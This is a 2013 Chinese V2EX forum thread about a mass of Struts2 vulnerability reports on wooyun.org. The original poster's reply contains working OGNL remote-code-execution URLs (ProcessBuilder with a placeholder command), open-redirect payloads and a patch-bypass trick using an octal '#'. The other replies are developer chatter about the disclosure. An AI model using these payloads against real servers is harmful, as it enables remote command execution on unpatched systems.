V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
lecher
V2EX  ›  信息安全

wooyun.org上今天提交了一百多个关于struts的漏洞

  •  
  •   lecher · 2013-07-17 20:59:54 +08:00 · 6367 次点击
    这是一个创建于 4150 天前的主题,其中的信息可能已经有所发展或是发生改变。
    使用这个java框架的网址基本都沦陷了,目前第一波目标都是针对BAT这种基本的公司的,有多少人因为这个事情要加班了?
    漏洞列表看这里 http://wooyun.org/bug.php?action=list&type=3
    14 条回复    1970-01-01 08:00:00 +08:00
    lecher
        1
    lecher  
    OP
       2013-07-17 21:19:03 +08:00
    受影响的是Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。主要安全漏洞如下:
    以POST的方式提交绕过对输入参数的部分过滤。命令执行主要是通过ognl对象的上下文内置静态函数进行执行的。
    如@Runtime@getRuntime().exec
    @class@method
    访问静态方法xwork 的ognl语句 执行,变量必须要带有#,之前通过\0023 (16进制的#) 来绕过,官方补丁屏蔽了这种但是可以利用\43(8进制的#)进行绕过。

    1. 通过在参数前面加上“action:”/“redirect:”/“redirectAction:”前缀,以实现远程代码执行,如下:
    http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


    http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


    http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

    2. 通过在参数前面加上“redirect:”/“redirectAction:”前缀,以实现开放式重定向,如下:
    http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/

    http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23
    Kvm
        2
    Kvm  
       2013-07-17 21:26:34 +08:00
    大牛
    kevinv
        3
    kevinv  
       2013-07-17 21:35:01 +08:00
    我今天也刚注意到
    luikore
        4
    luikore  
       2013-07-17 22:03:58 +08:00
    珍爱生命, 远离 java, 这句话都说多少年了...
    raptium
        5
    raptium  
       2013-07-17 22:40:26 +08:00
    苦逼 Java 程序员表示刚紧急处理完两个项目回家……
    Paranoid
        6
    Paranoid  
       2013-07-17 22:58:17 +08:00
    和 struts 有仇呀,一下爆这么多, 怎么也得一天一个,慢慢玩 ..哈哈
    aurorawu
        7
    aurorawu  
       2013-07-17 23:33:55 +08:00
    人生苦短,工作之余我用Python
    ccbikai
        8
    ccbikai  
       2013-07-17 23:40:28 +08:00 via Android
    为什么他们昨天前天没有提交呢?

    都是吃剩饭的?
    lecher
        9
    lecher  
    OP
       2013-07-18 00:25:01 +08:00   ❤️ 1
    因为漏洞的原理和应用已经公布了,知道如何用的人很多,官方又公布了补丁,现在wooyun上面爆提交其实就是抢在厂商没有打补丁这段时间多刷点wooyun积分。
    实际的入侵工作恐怕早就已经做过了。白帽们不屑于扫库拖库的事情,他们就是想赚点名声。
    而那些利用漏洞牟利的人,恐怕早就把该拖的库拖走了。
    cctvsmg
        10
    cctvsmg  
       2013-07-18 04:52:53 +08:00
    @lecher 此事其实apache要负主要责任,公布的太草率了
    davepkxxx
        11
    davepkxxx  
       2013-07-18 05:47:22 +08:00
    没影响,早就换成spring-mvc了。
    vietor
        12
    vietor  
       2013-07-18 09:10:55 +08:00
    @raptium java的架构一般都太复杂了,坑没准在哪里出现。将板子打到java语言本上不太合适。
    davepkxxx
        13
    davepkxxx  
       2013-07-19 12:30:01 +08:00
    struts项目那帮人就是个2,修补一个漏洞时表现的也很奇葩。官方完全没有理解漏洞原理,仅仅针对漏洞报告者提供的特征字符做了过滤,结果接二连三的被绕过,一个简单的漏洞,修补了两三次都没有修补好。
    zhttty
        14
    zhttty  
       2013-07-19 12:50:40 +08:00
    很多人根本就不理解struts运行核心流程,培训了几周就用了...出了问题能怪谁?源码就在那里,不看是你个人的问题。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1081 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 19:58 · PVG 03:58 · LAX 11:58 · JFK 14:58
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.